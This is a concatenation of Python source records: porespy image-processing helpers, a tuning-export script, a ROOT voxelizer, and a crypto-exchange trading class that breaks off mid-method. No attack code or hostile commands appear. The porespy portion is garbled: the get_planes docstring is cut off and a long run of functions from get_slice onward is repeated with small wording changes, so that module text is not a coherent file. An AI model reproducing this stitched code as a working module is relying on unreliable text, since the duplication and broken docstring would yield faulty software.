images for\n memory or speed. Note that for most typical operations this will NOT work,\n since the image borders would cause artifacts (e.g. ``distance_transform``)\n\n Parameters\n ----------\n im : ND-array\n The image of the porous media\n\n divs : scalar or array_like\n The number of sub-divisions to create in each axis of the image. If a\n scalar is given it is assumed this value applies in all dimensions.\n\n Returns\n -------\n An ND-array containing slice objects for indexing into ``im`` that extract\n the sub-divided arrays.\n\n Notes\n -----\n This method uses the\n `array_split package `_ which\n offers the same functionality as the ``split`` method of Numpy's ND-array,\n but supports the splitting multidimensional arrays in all dimensions.\n\n Examples\n --------\n >>> import porespy as ps\n >>> import matplotlib.pyplot as plt\n >>> im = ps.generators.blobs(shape=[200, 200])\n >>> s = ps.tools.subdivide(im, divs=[2, 2])\n\n ``s`` contains an array with the shape given by ``divs``. 
To access the\n first and last quadrants of ``im`` use:\n >>> print(im[s[0, 0]].shape)\n (100, 100)\n >>> print(im[s[1, 1]].shape)\n (100, 100)\n\n It can be easier to index the array with the slices by applying ``flatten``\n first:\n >>> s_flat = s.flatten()\n >>> for i in s_flat:\n ... print(im[i].shape)\n (100, 100)\n (100, 100)\n (100, 100)\n (100, 100)\n \"\"\"\n # Expand scalar divs\n if sp.array(divs, ndmin=1).size == 1:\n divs = [divs for i in range(im.ndim)]\n s = shape_split(im.shape, axis=divs)\n return s\n\n\ndef bbox_to_slices(bbox):\n r\"\"\"\n Given a tuple containing bounding box coordinates, return a tuple of slice\n objects.\n\n Parameters\n ----------\n bbox : tuple of ints\n The bounding box indices in the form (``xmin``, ``ymin``, ``zmin``,\n ``xmax``, ``ymax``, ``zmax``). For a 2D image, simply omit the\n ``zmin`` and ``zmax`` entries.\n\n Returns\n -------\n A tuple of slice objects that can be used to directly index into a larger\n image. A\n \"\"\"\n if len(bbox) == 4:\n ret = (slice(bbox[0], bbox[2]),\n slice(bbox[1], bbox[3]))\n else:\n ret = (slice(bbox[0], bbox[3]),\n slice(bbox[1], bbox[4]),\n slice(bbox[2], bbox[5]))\n return ret\n\n\ndef get_slice(im, center, size, pad=0):\n r\"\"\"\n Given a ``center`` location and ``radius`` of a feature, returns the slice\n object into the ``im`` that bounds the feature but does not extend beyond\n the image boundaries.\n\n Parameters\n ----------\n im : ND-image\n The image of the porous media\n\n center : array_like\n The coordinates of the center of the feature of interest\n\n size : array_like or scalar\n The size of the feature in each direction. If a scalar is supplied,\n this implies the same size in all directions.\n\n pad : scalar or array_like\n The amount to pad onto each side of the slice. The default is 0. A\n scalar value will increase the slice size equally in all directions,\n while an array the same shape as ``im.shape`` can be passed to pad\n a specified amount in each direction.\n\n Returns\n -------\n A list of slice objects, each indexing into one dimension of the image.\n \"\"\"\n p = sp.ones(shape=im.ndim, dtype=int)*sp.array(pad)\n s = sp.ones(shape=im.ndim, dtype=int)*sp.array(size)\n slc = []\n for dim in range(im.ndim):\n lower_im = sp.amax((center[dim] - s[dim] - p[dim], 0))\n upper_im = sp.amin((center[dim] + s[dim] + 1 + p[dim], im.shape[dim]))\n slc.append(slice(lower_im, upper_im))\n return slc\n\n\ndef find_outer_region(im, r=0):\n r\"\"\"\n Finds regions of the image that are outside of the solid matrix. This\n function uses the rolling ball method to define where the outer region\n ends and the void space begins.\n\n This function is particularly useful for samples that do not fill the\n entire rectangular image, such as cylindrical cores or samples with non-\n parallel faces.\n\n Parameters\n ----------\n im : ND-array\n Image of the porous material with 1's for void and 0's for solid\n\n r : scalar\n The radius of the rolling ball to use. If not specified then a value\n is calculated as twice maximum of the distance transform. 
The image\n        size is padded by this amount in all directions, so the image can\n        become quite large and unwieldy if too large a value is given.\n\n    Returns\n    -------\n    A boolean mask the same shape as ``im``, containing True in all voxels\n    identified as *outside* the sample.\n\n    \"\"\"\n    if r == 0:\n        dt = spim.distance_transform_edt(input=im)\n        r = int(sp.amax(dt))*2\n    im_padded = sp.pad(array=im, pad_width=r, mode='constant',\n                       constant_values=True)\n    dt = spim.distance_transform_edt(input=im_padded)\n    seeds = (dt >= r) + get_border(shape=im_padded.shape)\n    # Remove seeds not connected to edges\n    labels = spim.label(seeds)[0]\n    mask = labels == 1 # Assume label of 1 on edges, assured by adding border\n    dt = spim.distance_transform_edt(~mask)\n    outer_region = dt < r\n    outer_region = extract_subsection(im=outer_region, shape=im.shape)\n    return outer_region\n\n\ndef extract_cylinder(im, r=None, axis=0):\n    r\"\"\"\n    Returns a cylindrical section of the image of specified radius. This is\n    useful for making square images look like cylindrical cores such as those\n    obtained from X-ray tomography.\n\n    Parameters\n    ----------\n    im : ND-array\n        The image of the porous material\n\n    r : scalar\n        The radius of the cylinder to extract. If ``None`` is given, the\n        default is the largest cylinder that can fit inside the x-y plane.\n\n    axis : scalar\n        The axis along which the cylinder will be oriented.\n\n    Returns\n    -------\n    An ND-image the same size as ``im`` with True values indicating the void\n    space but with the sample trimmed to a cylindrical section in the center\n    of the image. The region outside the cylindrical section is labeled with\n    True values since it is open space.\n    \"\"\"\n    if r is None:\n        a = list(im.shape)\n        a.pop(axis)\n        r = sp.amin(a)/2\n    dim = [range(int(-s/2), int(s/2)) for s in im.shape]\n    inds = sp.meshgrid(*dim, indexing='ij')\n    inds[axis] = inds[axis]*0\n    d = sp.sqrt(sp.sum(sp.square(inds), axis=0))\n    mask = d <= r\n    im[~mask] = True\n    return im\n\n\ndef extract_subsection(im, shape):\n    r\"\"\"\n    Extracts the middle section of an image\n\n    Parameters\n    ----------\n    im : ND-array\n        Image from which to extract the subsection\n\n    shape : array_like\n        Can either specify the size of the extracted section or the fractional\n        size of the image to extract.\n\n    Returns\n    -------\n    An ND-array of size given by the ``shape`` argument, taken from the center\n    of the image.\n\n    Examples\n    --------\n    >>> import scipy as sp\n    >>> from porespy.tools import extract_subsection\n    >>> im = sp.array([[1, 1, 1, 1], [1, 2, 2, 2], [1, 2, 3, 3], [1, 2, 3, 4]])\n    >>> print(im)\n    [[1 1 1 1]\n     [1 2 2 2]\n     [1 2 3 3]\n     [1 2 3 4]]\n    >>> im = extract_subsection(im=im, shape=[2, 2])\n    >>> print(im)\n    [[2 2]\n     [2 3]]\n\n    \"\"\"\n    # Check if shape was given as a fraction\n    shape = sp.array(shape)\n    if shape[0] < 1:\n        shape = sp.array(im.shape)*shape\n    center = sp.array(im.shape)/2\n    s_im = []\n    for dim in range(im.ndim):\n        r = shape[dim]/2\n        lower_im = sp.amax((center[dim]-r, 0))\n        upper_im = sp.amin((center[dim]+r, im.shape[dim]))\n        s_im.append(slice(int(lower_im), int(upper_im)))\n    return im[tuple(s_im)]\n\n\ndef get_planes(im, squeeze=True):\n    r\"\"\"\n    Extracts three planar images from the volumetric image, one for each\n    principal axis. The planes are taken from the middle of the domain.\n\n    Parameters\n    ----------\n    im : ND-array\n        The volumetric image from which the 3 planar images are to be obtained\n\n    squeeze : boolean, optional\n        If True (default) the returned images are 2D (i.e. squeezed). 
 \"\"\"\n p = sp.ones(shape=im.ndim, dtype=int)*sp.array(pad)\n s = sp.ones(shape=im.ndim, dtype=int)*sp.array(size)\n slc = []\n for dim in range(im.ndim):\n lower_im = sp.amax((center[dim] - s[dim] - p[dim], 0))\n upper_im = sp.amin((center[dim] + s[dim] + 1 + p[dim], im.shape[dim]))\n slc.append(slice(lower_im, upper_im))\n return slc\n\n\ndef find_outer_region(im, r=0):\n r\"\"\"\n Finds regions of the image that are outside of the solid matrix. This\n function uses the rolling ball method to define where the outer region\n ends and the void space begins.\n\n This function is particularly useful for samples that do not fill the\n entire rectangular image, such as cylindrical cores or samples with non-\n parallel faces.\n\n Parameters\n ----------\n im : ND-array\n Image of the porous material with 1's for void and 0's for solid\n\n r : scalar\n The radius of the rolling ball to use. If not specified then a value\n is calculated as twice the maximum of the distance transform. The image\n size is padded by this amount in all directions, so the image can\n become quite large and unwieldy if too large a value is given.\n\n Returns\n -------\n A boolean mask the same shape as ``im``, containing True in all voxels\n identified as *outside* the sample.\n\n \"\"\"\n if r == 0:\n dt = spim.distance_transform_edt(input=im)\n r = int(sp.amax(dt))*2\n im_padded = sp.pad(array=im, pad_width=r, mode='constant',\n constant_values=True)\n dt = spim.distance_transform_edt(input=im_padded)\n seeds = (dt >= r) + get_border(shape=im_padded.shape)\n # Remove seeds not connected to edges\n labels = spim.label(seeds)[0]\n mask = labels == 1 # Assume label of 1 on edges, assured by adding border\n dt = spim.distance_transform_edt(~mask)\n outer_region = dt < r\n outer_region = extract_subsection(im=outer_region, shape=im.shape)\n return outer_region\n\n\ndef extract_cylinder(im, r=None, axis=0):\n r\"\"\"\n Returns a cylindrical section of the image of specified radius. This is\n useful for making square images look like cylindrical cores such as those\n obtained from X-ray tomography.\n\n Parameters\n ----------\n im : ND-array\n The image of the porous material\n\n r : scalar\n The radius of the cylinder to extract. If none is given then the\n default is the largest cylinder that can fit inside the x-y plane.\n\n axis : scalar\n The axis along which the cylinder will be oriented.\n\n Returns\n -------\n An ND-image the same size as ``im`` with True values indicating the void space\n but with the sample trimmed to a cylindrical section in the center of the\n image. The region outside the cylindrical section is labeled with True\n values since it is open space.\n \"\"\"\n if r is None:\n a = list(im.shape)\n a.pop(axis)\n r = sp.amin(a)/2\n dim = [range(int(-s/2), int(s/2)) for s in im.shape]\n inds = sp.meshgrid(*dim, indexing='ij')\n inds[axis] = inds[axis]*0\n d = sp.sqrt(sp.sum(sp.square(inds), axis=0))\n mask = d <= r\n im[~mask] = True\n return im\n\n\ndef extract_subsection(im, shape):\n r\"\"\"\n Extracts the middle section of an image\n\n Parameters\n ----------\n im : ND-array\n Image from which to extract the subsection\n\n shape : array_like\n Can either specify the size of the extracted section or the fractional\n size of the image to extract.\n\n Returns\n -------\n An ND-array of size given by the ``shape`` argument, taken from the center\n of the image.\n\n Examples\n --------\n >>> import scipy as sp\n >>> from porespy.tools import extract_subsection\n >>> im = sp.array([[1, 1, 1, 1], [1, 2, 2, 2], [1, 2, 3, 3], [1, 2, 3, 4]])\n >>> print(im)\n [[1 1 1 1]\n [1 2 2 2]\n [1 2 3 3]\n [1 2 3 4]]\n >>> im = extract_subsection(im=im, shape=[2, 2])\n >>> print(im)\n [[2 2]\n [2 3]]\n\n \"\"\"\n # Check if shape was given as a fraction\n shape = sp.array(shape)\n if shape[0] < 1:\n shape = sp.array(im.shape)*shape\n center = sp.array(im.shape)/2\n s_im = []\n for dim in range(im.ndim):\n r = shape[dim]/2\n lower_im = sp.amax((center[dim]-r, 0))\n upper_im = sp.amin((center[dim]+r, im.shape[dim]))\n s_im.append(slice(int(lower_im), int(upper_im)))\n return im[tuple(s_im)]\n\n\ndef get_planes(im, squeeze=True):\n r\"\"\"\n Extracts three planar images from the volumetric image, one for each\n principal axis. The planes are taken from the middle of the domain.\n\n Parameters\n ----------\n im : ND-array\n The volumetric image from which the 3 planar images are to be obtained\n\n squeeze : boolean, optional\n If True (default) the returned images are 2D (i.e. squeezed). If\n False, the images are 1 element deep along the axis where the slice\n was obtained.\n
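\n For example, with an illustrative 4 x 6 x 8 image:\n\n >>> import scipy as sp\n >>> from porespy.tools import get_planes\n >>> planes = get_planes(sp.ones([4, 6, 8]))\n >>> [p.shape for p in planes]\n [(6, 8), (4, 8), (4, 6)]\n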
 \"\"\"\n x, y, z = (sp.array(im.shape)/2).astype(int)\n planes = [im[x, :, :], im[:, y, :], im[:, :, z]]\n if not squeeze:\n imx = planes[0]\n planes[0] = sp.reshape(imx, [1, imx.shape[0], imx.shape[1]])\n imy = planes[1]\n planes[1] = sp.reshape(imy, [imy.shape[0], 1, imy.shape[1]])\n imz = planes[2]\n planes[2] = sp.reshape(imz, [imz.shape[0], imz.shape[1], 1])\n return planes\n\n\ndef extend_slice(s, shape, pad=1):\n r\"\"\"\n Adjust slice indices to include additional voxels around the slice. The\n key to this function is that it does bounds checking to ensure the indices\n don't extend outside the image.\n\n Parameters\n ----------\n s : list of slice objects\n A list (or tuple) of N slice objects, where N is the number of\n dimensions in the image.\n\n shape : array_like\n The shape of the image into which the slice objects apply. This is\n used to check the bounds to prevent indexing beyond the image.\n\n pad : int\n The number of voxels to expand in each direction.\n\n Returns\n -------\n A list of slice objects with the start and stop attributes respectively\n decremented and incremented by ``pad``, without extending beyond the image\n boundaries.\n\n Examples\n --------\n >>> from scipy.ndimage import label, find_objects\n >>> from porespy.tools import extend_slice\n >>> im = sp.array([[1, 0, 0], [1, 0, 0], [0, 0, 1]])\n >>> labels = label(im)[0]\n >>> s = find_objects(labels)\n\n Using the slices returned by ``find_objects``, set the first label to 3\n\n >>> labels[s[0]] = 3\n >>> print(labels)\n [[3 0 0]\n [3 0 0]\n [0 0 2]]\n\n Next extend the slice, and use it to set the values to 4\n\n >>> s_ext = extend_slice(s[0], shape=im.shape, pad=1)\n >>> labels[s_ext] = 4\n >>> print(labels)\n [[4 4 0]\n [4 4 0]\n [4 4 2]]\n\n As can be seen by the location of the 4s, the slice was extended by 1, and\n also handled the extension beyond the boundary correctly.\n \"\"\"\n pad = int(pad)\n a = []\n for i, dim in zip(s, shape):\n start = 0\n stop = dim\n if i.start - pad >= 0:\n start = i.start - pad\n if i.stop + pad < dim:\n stop = i.stop + pad\n a.append(slice(start, stop, None))\n return tuple(a)\n\n\ndef binary_opening_fft(im, strel):\n r\"\"\"\n Uses the ``scipy.signal.fftconvolve`` function (twice) to accomplish\n binary image opening.\n\n The use of the fft-based convolution produces a 10x speed-up compared to\n the standard ``binary_opening`` included in ``scipy.ndimage``.\n\n See Also\n --------\n binary_opening_dt\n\n Notes\n -----\n The ``fftconvolve`` function is only optimized in some scipy installations,\n depending how it was compiled. If the promised speed-up is not achieved,\n this may be the issue. Using ``binary_opening_dt`` should still be fast\n but is limited to spherical and circular structuring elements.\n\n \"\"\"\n if isinstance(strel, int):\n if im.ndim == 2:\n strel = disk(strel)\n else:\n strel = ball(strel)\n seeds = sp.signal.fftconvolve(im, strel) > (strel.sum() - 0.1)\n result = sp.signal.fftconvolve(seeds, strel) > 0.1\n result = extract_subsection(result, im.shape)\n return result\n\n\ndef binary_opening_dt(im, r):\n r\"\"\"\n Perform a morphological opening that does not slow down with larger\n structuring elements.\n\n It uses a shortcut based on the distance transform, which means it only\n applies to spherical (or circular if the image is 2d) structuring elements.\n\n Parameters\n ----------\n im : ND-array\n The image of the porous material with True values (or 1's) indicating\n the pore phase.\n\n r : scalar, int\n The radius of the spherical structuring element to apply\n\n Returns\n -------\n A binary image with ``True`` values in all locations where a sphere of size\n ``r`` could fit entirely within the pore space.\n\n See Also\n --------\n binary_opening_fft\n
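\n Examples\n --------\n An illustrative opening of a 5 x 5 image of all ``True`` values with\n ``r=1``; only the four corner voxels are lost, since a sphere of radius\n 1 cannot reach them:\n\n >>> import scipy as sp\n >>> from porespy.tools import binary_opening_dt\n >>> binary_opening_dt(sp.ones([5, 5], dtype=bool), r=1).sum()\n 21\n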
\n \"\"\"\n temp = sp.pad(im, pad_width=1, mode='constant', constant_values=0)\n dt = spim.distance_transform_edt(temp)\n seeds = dt > r\n im_opened = spim.distance_transform_edt(~seeds) <= r\n im_opened = extract_subsection(im_opened, im.shape)\n return im_opened\n\n\ndef randomize_colors(im, keep_vals=[0]):\n r'''\n Takes a greyscale image and randomly shuffles the greyscale values, so that\n all voxels labelled X will be labelled Y, and all voxels labelled Y will be\n labelled Z, where X, Y, Z and so on are randomly selected from the values\n in the input image.\n\n This function is useful for improving the visibility of images with\n neighboring regions that are only incrementally different from each other,\n such as that returned by `scipy.ndimage.label`.\n\n Parameters\n ----------\n im : array_like\n An ND image of greyscale values.\n\n keep_vals : array_like\n Indicate which voxel values should NOT be altered. The default is\n `[0]` which is useful for leaving the background of the image\n untouched.\n\n Returns\n -------\n An image the same size and type as `im` but with the greyscale values\n reassigned. The unique values in both the input and output images will\n be identical.\n\n Notes\n -----\n If the greyscale values in the input image are not contiguous then\n neither will they be in the output.\n\n Examples\n --------\n >>> import porespy as ps\n >>> import scipy as sp\n >>> sp.random.seed(0)\n >>> im = sp.random.randint(low=0, high=5, size=[4, 4])\n >>> print(im)\n [[4 0 3 3]\n [3 1 3 2]\n [4 0 0 4]\n [2 1 0 1]]\n >>> im_rand = ps.tools.randomize_colors(im)\n >>> print(im_rand)\n [[2 0 4 4]\n [4 1 4 3]\n [2 0 0 2]\n [3 1 0 1]]\n\n As can be seen, the 2's have become 3, 3's have become 4, and 4's have\n become 2. 1's remained 1 by random accident. 0's remain zeros by default,\n but this can be controlled using the `keep_vals` argument.\n\n '''\n im_flat = im.flatten()\n keep_vals = sp.array(keep_vals)\n swap_vals = ~sp.in1d(im_flat, keep_vals)\n im_vals = sp.unique(im_flat[swap_vals])\n new_vals = sp.random.permutation(im_vals)\n im_map = sp.zeros(shape=[sp.amax(im_vals) + 1, ], dtype=int)\n im_map[im_vals] = new_vals\n im_new = im_map[im_flat]\n im_new = sp.reshape(im_new, newshape=sp.shape(im))\n return im_new\n\n\ndef make_contiguous(im):\n r\"\"\"\n Take an image with arbitrary greyscale values and adjust them to ensure\n all values fall in a contiguous range starting at 0.\n\n Parameters\n ----------\n im : array_like\n An ND array containing greyscale values\n\n Returns\n -------\n An ND-array the same size as ``im`` but with all values in a contiguous\n order.\n\n Example\n -------\n >>> import porespy as ps\n >>> import scipy as sp\n >>> im = sp.array([[0, 2, 9], [6, 8, 3]])\n >>> im = ps.tools.make_contiguous(im)\n >>> print(im)\n [[0 1 5]\n [3 4 2]]\n\n \"\"\"\n im_flat = im.flatten()\n im_vals = sp.unique(im_flat)\n im_map = sp.zeros(shape=sp.amax(im_flat)+1)\n im_map[im_vals] = sp.arange(0, sp.size(sp.unique(im_flat)))\n im_new = im_map[im_flat]\n im_new = sp.reshape(im_new, newshape=sp.shape(im))\n im_new = sp.array(im_new, dtype=im_flat.dtype)\n return im_new\n\n\ndef get_border(shape, thickness=1, mode='edges'):\n r\"\"\"\n Creates an array of specified size with corners, edges or faces labelled as\n True. This can be used as a mask to manipulate values lying on the\n perimeter of an image.\n\n Parameters\n ----------\n shape : array_like\n The shape of the array to return. Can be either 2D or 3D.\n\n thickness : scalar (default is 1)\n The number of pixels/voxels to place along perimeter.\n\n mode : string\n The type of border to create. Options are 'faces', 'edges' (default)\n and 'corners'. In 2D 'faces' and 'edges' give the same result.\n\n Returns\n -------\n An ND-array of specified shape with True values at the perimeter and False\n elsewhere.\n\n Examples\n --------\n >>> import porespy as ps\n >>> import scipy as sp\n >>> mask = ps.tools.get_border(shape=[3, 3], mode='corners')\n >>> print(mask)\n [[ True False True]\n [False False False]\n [ True False True]]\n >>> mask = ps.tools.get_border(shape=[3, 3], mode='edges')\n >>> print(mask)\n [[ True True True]\n [ True False True]\n [ True True True]]\n \"\"\"\n ndims = len(shape)\n t = thickness\n border = sp.ones(shape, dtype=bool)\n if mode == 'faces':\n if ndims == 2:\n border[t:-t, t:-t] = False\n if ndims == 3:\n border[t:-t, t:-t, t:-t] = False\n elif mode == 'edges':\n if ndims == 2:\n border[t:-t, t:-t] = False\n if ndims == 3:\n border[0::, t:-t, t:-t] = False\n border[t:-t, 0::, t:-t] = False\n border[t:-t, t:-t, 0::] = False\n elif mode == 'corners':\n if ndims == 2:\n border[t:-t, 0::] = False\n border[0::, t:-t] = False\n if ndims == 3:\n border[t:-t, 0::, 0::] = False\n border[0::, t:-t, 0::] = False\n border[0::, 0::, t:-t] = False\n return border\n\n\ndef in_hull(points, hull):\n \"\"\"\n Test if a list of coordinates are inside a given convex hull\n\n Parameters\n ----------\n points : array_like (N x ndims)\n The spatial coordinates of the points to check\n\n hull : scipy.spatial.ConvexHull object **OR** array_like\n Can be either a convex hull object as returned by\n ``scipy.spatial.ConvexHull`` or simply the coordinates of the points\n that define the convex hull.\n\n Returns\n -------\n A Boolean array of length *N* indicating whether or not the given points\n in ``points`` lie within the provided ``hull``.\n
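\n For example, checking two illustrative points against a unit square:\n\n >>> import scipy as sp\n >>> from porespy.tools import in_hull\n >>> square = sp.array([[0, 0], [0, 1], [1, 0], [1, 1]])\n >>> print(in_hull([[0.5, 0.5], [2.0, 2.0]], square))\n [ True False]\n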
\n \"\"\"\n from scipy.spatial import Delaunay, ConvexHull\n if isinstance(hull, ConvexHull):\n hull = hull.points\n hull = Delaunay(hull)\n return hull.find_simplex(points) >= 0\n\n\ndef norm_to_uniform(im, scale=None):\n r\"\"\"\n Takes an image with normally distributed greyscale values and converts it to\n a uniform (i.e. flat) distribution. It's also possible to specify the\n lower and upper limits of the uniform distribution.\n\n Parameters\n ----------\n im : ND-image\n The image containing the normally distributed scalar field\n\n scale : [low, high]\n A list or array indicating the lower and upper bounds for the new\n randomly distributed data. The default is ``None``, which uses the\n ``max`` and ``min`` of the original image as the lower and upper\n bounds, but another common option might be [0, 1].\n\n Returns\n -------\n An ND-image the same size as ``im`` with uniformly distributed greyscale\n values spanning the specified range, if given.\n
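\n For example, rescaling an illustrative normally distributed field onto\n [0, 1]:\n\n >>> import scipy as sp\n >>> from porespy.tools import norm_to_uniform\n >>> im = sp.random.randn(50, 50)\n >>> flat = norm_to_uniform(im, scale=[0, 1])\n >>> bool((flat >= 0).all() and (flat <= 1).all())\n True\n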
 \"\"\"\n if scale is None:\n scale = [im.min(), im.max()]\n im = (im - sp.mean(im))/sp.std(im)\n im = 1/2*sp.special.erfc(-im/sp.sqrt(2))\n im = (im - im.min()) / (im.max() - im.min())\n im = im*(scale[1] - scale[0]) + scale[0]\n return im\n","sub_path":"porespy/tools/__funcs__.py","file_name":"__funcs__.py","file_ext":"py","file_size_in_byte":23403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"495175084","text":"#!/usr/bin/env python\n\nfrom RingerCore import LoggingLevel, expandFolders, Logger, mkdir_p\nfrom TuningTools import CrossValidStatAnalysis, RingerOperation\nfrom pprint import pprint\nimport os\nmainLogger = Logger.getModuleLogger( __name__ )\n\n\nbasepath = 'data/crossval/'\ncrossval = [\n [basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_Tight_PileupCorrection/', ],\n #[basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_Medium_PileupCorrection/', ],\n #[basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_Loose_PileupCorrection/', ],\n #[basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_VeryLoose_PileupCorrection/', ],\n ]\n\nfilenameWeights = [\n 'ElectronRingerTightConstants',\n #'ElectronRingerMediumConstants',\n #'ElectronRingerLooseConstants',\n #'ElectronRingerVeryloooseConstants',\n ]\n\nfilenameThres = [\n 'ElectronRingerTightThresholds',\n #'ElectronRingerMediumThresholds',\n #'ElectronRingerLooseThresholds',\n #'ElectronRingerVeryLooseThresholds',\n ]\n\n\nref = 'Pd'\n\n\n\n####################### Extract Ringer Configuration #########################\n\nfrom TuningTools import CreateSelectorFiles\n\nexport = CreateSelectorFiles()\nexport( crossval, filenameWeights, filenameThres, ref )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"TuningTools_old/scripts/analysis_scripts/dev/Offline_mc16_201802XX_v6/export_tuning.py","file_name":"export_tuning.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"643091651","text":"import shelve\nfrom ROOT import *\nfrom tools import *\nfrom sys import argv\n\nprefijo = 'SE/'\n\nfor x,y,z,E,dE,chi2n,chi2r in ReadData(prefijo):\n z0 = min(z)\n Nz = int(max(z)-z0)+1\n z1 = z0 + Nz\n\n x0 = min(x)\n Nx = int(max(x)-x0)+1\n x1 = x0 + Nx\n\n y0 = min(y)\n Ny = int(max(y)-y0)+1\n y1 = y0 + Ny\n\n H = TH3F('a','',Nz,z0,z1,Nx,x0,x1,Ny,y0,y1)\n h = H.Clone()\n for xi,yi,zi,Ei in zip(x,y,z,E):\n bin = h.Fill(zi,xi,yi)\n H.SetBinContent( bin, H.GetBinContent(bin) + Ei )\n\n H.Draw()\n raw_input()\n del H\n","sub_path":"Voxelizer.py","file_name":"Voxelizer.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"224981662","text":"import threading\nimport time\nimport traceback\nimport sys\nfrom aj_sns.creds_retriever import get_creds\nfrom decimal import Decimal\nfrom aj_sns.log_service import logger\nfrom 
quoine.client import Qryptos\nfrom quoine.exceptions import QuoineAPIException\n\nfrom exchanges.exchange import Exchange\n\n\nclass QryptosService(Exchange):\n def __init__(self, name, public_key, private_key, poll_time_s=5, tick_tock=True):\n Exchange.__init__(self, name)\n self.pending_cancel = {}\n self.client = Qryptos(public_key, private_key)\n self.client.API_URL = 'https://api.liquid.com'\n self.internal_to_external_id = {}\n self.external_to_internal_id = {}\n self.open_orders_by_exchange_id = {}\n self.symbol_to_product = {}\n self.markets_following = {}\n product_list = self.client.get_products()\n for product in product_list:\n if 'product_type' in product and product['product_type'] == 'CurrencyPair':\n self.symbol_to_product[product['currency_pair_code']] = product['id']\n\n self.poll_time_s = poll_time_s\n self.tick_tock = tick_tock\n self.name = name\n\n if tick_tock is True:\n threading.Timer(self.poll_time_s, self.on_tick).start()\n\n def can_withdraw(self, withdraw):\n return False\n\n def withdraw(self, currency, amount, address, tag=None, cb=None, **kwargs):\n raise NotImplementedError('Qryptos does not have a withdraw function in their API')\n\n def on_tick(self):\n logger().info('tick')\n\n if len(self.callbacks) > 0:\n for product_id, details in self.markets_following.copy().items():\n try:\n base = details['base']\n quote = details['quote']\n\n self._send_executions_to_cb(base, quote)\n self._send_order_book_to_cb(base, quote)\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n logger().error('on_tick failed with error: ' + str(e))\n\n logger().info('tock')\n if len(self.markets_following) > 0:\n threading.Timer(self.poll_time_s, self.on_tick).start()\n\n def _send_order_book_to_cb(self, base, quote):\n book = self.get_order_book(base, quote)\n\n self.notify_callbacks('order_book', data=book)\n\n def _send_executions_to_cb(self, base, quote):\n if len(self.open_orders_by_exchange_id) == 0:\n return\n\n for open_order in self.open_orders_by_exchange_id.copy().values():\n exchange_order = self.client.get_order(open_order['exchange_order_id'])\n newly_executed_amount = Decimal(str(exchange_order['filled_quantity'])) - \\\n Decimal(str(open_order['cum_quantity_filled']))\n\n if newly_executed_amount > Decimal(0):\n open_order['cum_quantity_filled'] = Decimal(exchange_order['filled_quantity'])\n\n if 'fee_base' in open_order.keys():\n fee_base_delta = Decimal(exchange_order['order_fee']) - Decimal(open_order['fee_base'])\n else:\n fee_base_delta = Decimal(exchange_order['order_fee'])\n\n open_order['fee_base'] = Decimal(exchange_order['order_fee'])\n\n if exchange_order['status'] == 'filled':\n status = 'FILLED'\n self.open_orders_by_exchange_id.pop(str(exchange_order['id']))\n self.external_to_internal_id.pop(str(open_order['exchange_order_id']))\n self.internal_to_external_id.pop(str(open_order['internal_order_id']))\n elif exchange_order['status'] == 'cancelled':\n status = 'CANCELED'\n self.open_orders_by_exchange_id.pop(str(exchange_order['id']))\n self.external_to_internal_id.pop(str(open_order['exchange_order_id']))\n self.internal_to_external_id.pop(str(open_order['internal_order_id']))\n else:\n status = 'PARTIALLY_FILLED'\n\n message = {\n 'action': 'EXECUTION',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'exchange_order_id': str(open_order['exchange_order_id']),\n 'internal_order_id': str(open_order['internal_order_id']),\n 'side': open_order['side'],\n 'quantity': open_order['quantity'],\n 'price': open_order['price'],\n 
'cum_quantity_filled': open_order['cum_quantity_filled'],\n 'order_status': status,\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000)),\n 'last_executed_quantity': newly_executed_amount,\n 'last_executed_price': open_order['price'],\n 'fee_base': fee_base_delta,\n 'fee_quote': Decimal('0'),\n 'trade_id': '-1'\n }\n\n self.notify_callbacks('trade_lifecycle', trade_lifecycle_type=message['action'], data=message)\n\n def follow_market(self, base, quote):\n product_id = self.get_product_id(base, quote)\n self.markets_following[str(product_id)] = {'base': base, 'quote': quote}\n\n # If this is the first market we've followed, start the tick tock\n if len(self.markets_following) == 1 and self.tick_tock is True:\n threading.Timer(self.poll_time_s, self.on_tick).start()\n\n def unfollow_market(self, base, quote):\n product_id = self.get_product_id(base, quote)\n self.markets_following.pop(str(product_id), None)\n\n def unfollow_all(self):\n self.markets_following = {}\n\n def get_exchange_id(self, internal_id):\n if internal_id in self.internal_to_external_id:\n return self.internal_to_external_id[internal_id]\n\n raise LookupError('Could not find open order with internal id: {}'.format(internal_id))\n\n def cancel_order(self, base, quote, internal_order_id, request_id, requester_id=None, exchange_order_id=None):\n try:\n if exchange_order_id is None:\n exchange_order_id = self.get_exchange_id(internal_order_id)\n except LookupError:\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCEL_FAILED',\n 'base': base,\n 'quote': quote,\n 'reason': 'order_not_found',\n 'exchange': self.name,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'UNKNOWN',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n return\n\n try:\n response = self.client.cancel_order(exchange_order_id)\n\n if ('message' in response and len(response['message']) > 0) or \\\n ('errors' in response and len(response['errors']) > 0):\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCEL_FAILED',\n 'reason': 'order_not_found',\n 'base': base,\n 'quote': quote,\n 'exchange': self.name,\n 'exchange_order_id': 